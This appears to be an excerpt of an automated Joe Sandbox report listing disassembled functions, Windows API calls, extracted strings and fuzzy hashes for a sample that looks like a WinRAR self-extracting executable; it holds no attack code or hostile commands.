                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                  • Instruction ID: c1e8eb04817830b7e8ad5a4545345aae0fa6609ed4e660cf56e057606f7341c5
                                                  • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                  • Instruction Fuzzy Hash: 37C1F577A291E04DE302CBB5A4348FD3FB1E71E34DB4A4151EFE6A6B4AD6285201DB60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID:
                                                  • API String ID: 190572456-0
                                                  • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                  • Instruction ID: 4dc4b00961e691a48d969696be8350b0a52a029d2117a1e8af20ee38a2509ec6
                                                  • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                  • Instruction Fuzzy Hash: B0910562B2858596EB11DF29E8622FD6721FF95789F441031EF8EC7B4ADE38D646C300
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                  • Instruction ID: 3737eef31322d0fc5582e848a6784978d53513049d8c6e90324f1ca0f9acc633
                                                  • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                  • Instruction Fuzzy Hash: D0610122F281D149EB01CF7595214FD7BB1A71A785B8680B2CFDAD7A47CE38E546CB10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                  • Instruction ID: 2b49cc1d8f6243369ab1b7ba694fcb83ef6155cfc4a502c781ba0220f14c507d
                                                  • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                  • Instruction Fuzzy Hash: B2510073A281518BEB288F28E4267AD3751FB84B49F444134DB89C778ACE3DE541CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                  • Instruction ID: 725610c7465d166d4654aaed699686b9d361ae240be8cc9ba751273b1863b3c9
                                                  • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                  • Instruction Fuzzy Hash: 3431EAB2A285814BEB18DE1AEA6227EB7D1F785345F048139DB86C7B43DE3CE441CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                  • API String ID: 3668304517-727060406
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                  • API String ID: 4097890229-4048004291
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                  • API String ID: 2868844859-1533471033
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                  • API String ID: 3215553584-2617248754
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                  • API String ID: 3936042273-1315819833
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$ClassLongNameObject
                                                  • String ID: STATIC
                                                  • API String ID: 3746718000-1882779555
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                  • API String ID: 2915667086-2207617598
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: $
                                                  • API String ID: 3668304517-227171996
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2940173790-393685449
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AllocClearStringVariant
                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                  • API String ID: 1959693985-3505469590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ItemTextWindow
                                                  • String ID: LICENSEDLG
                                                  • API String ID: 2478532303-2177901306
                                                  • Opcode ID: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                  • Instruction ID: 63aa03997c32f074448ab370301189b697fc173f8f211e197e1256b43b316426
                                                  • Opcode Fuzzy Hash: e29db3841e3cac596c2aa5df9f59b5580221106af80a371471668d29e16b4ce4
                                                  • Instruction Fuzzy Hash: A141C521A1865682F7249F52B8353792760BF85F87F0445B5D98EC7BA6CF3CE9868340
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F7371
                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F737F
                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F73A9
                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F73EF
                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF6CA9F74F3,?,?,?,00007FF6CA9F525E,?,?,?,00007FF6CA9F5219), ref: 00007FF6CA9F73FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                  • Instruction ID: 7f5247b0a95dfd09dc4404a930df8e0f7a9f058bf6204aa49bf58aa0a9704002
                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                  • Instruction Fuzzy Hash: 22312621B2AA42A1EE16EF86BC215752394FF08BA5F494579ED9EC7382DF7CE041C310
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F162B
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F1648
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F1664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                  • API String ID: 667068680-1718035505
                                                  • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                  • Instruction ID: e75a736142998b8058a16d965048eac5f07bb009e669b7c3620a641de1046f7e
                                                  • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                  • Instruction Fuzzy Hash: 61115E20E29B4281FE588F41BE7527422A16F0C796F6C45B9EB9EC7351EE3CA4568780
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D51A4: GetVersionExW.KERNEL32 ref: 00007FF6CA9D51D5
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DED8C
                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DED98
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEDA8
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEDB6
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEDC4
                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CA9C5AB4), ref: 00007FF6CA9DEE05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                  • String ID:
                                                  • API String ID: 2092733347-0
                                                  • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                  • Instruction ID: d7851612a4b4fd77dc7d8ceb84f1b574d392553ddc242afc0a0b9841cb6c95a3
                                                  • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                  • Instruction Fuzzy Hash: 92517BB2F106518EEB14CFA8E4551AC37B1F748B89B60403ADE5EA7B58DF38E596C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                  • String ID:
                                                  • API String ID: 2092733347-0
                                                  • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                  • Instruction ID: 3e19f310fb0693c380fa8644a25fbee4294d4384f786ff6f5ab19cfdd6dc3af2
                                                  • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                  • Instruction Fuzzy Hash: 13314862F10A519EFB04CFB5E8911AC3370FB18759B54502AEE5EE3A58EF38D896C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: .rar$exe$rar$sfx
                                                  • API String ID: 3668304517-630704357
                                                  • Opcode ID: 9b8f9fc42827f07993982fd9f343e807743a6e075335c2f478db097a4822f4c0
                                                  • Instruction ID: 831f06cae7030a093f6f547cdfc0f87b1337114664524eb075b7ffe5720b915f
                                                  • Opcode Fuzzy Hash: 9b8f9fc42827f07993982fd9f343e807743a6e075335c2f478db097a4822f4c0
                                                  • Instruction Fuzzy Hash: 10A1BF22E24A4640EB049F75E8662B83361AF44B99F501275DE9EC77EBDF3CE582C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: abort$CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2889003569-2084237596
                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                  • Instruction ID: bd4671557fdf4e7073b09699d4cf0267ffc5acb5742606573548470c5708cc48
                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                  • Instruction Fuzzy Hash: DD91CE73A28B919AE710CF64E8913AD7BA0F704789F104179EE8D87B5ADF38D195CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                  • Instruction ID: 39f7768878bea854b7db9a62b8cd4b20bdfd9d1783242f9e416067c4e4328a82
                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                  • Instruction Fuzzy Hash: CD51B032B2964286EB14CF11FCA5A393795FB40B89F5580B8EA9EC7749DF78E841C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
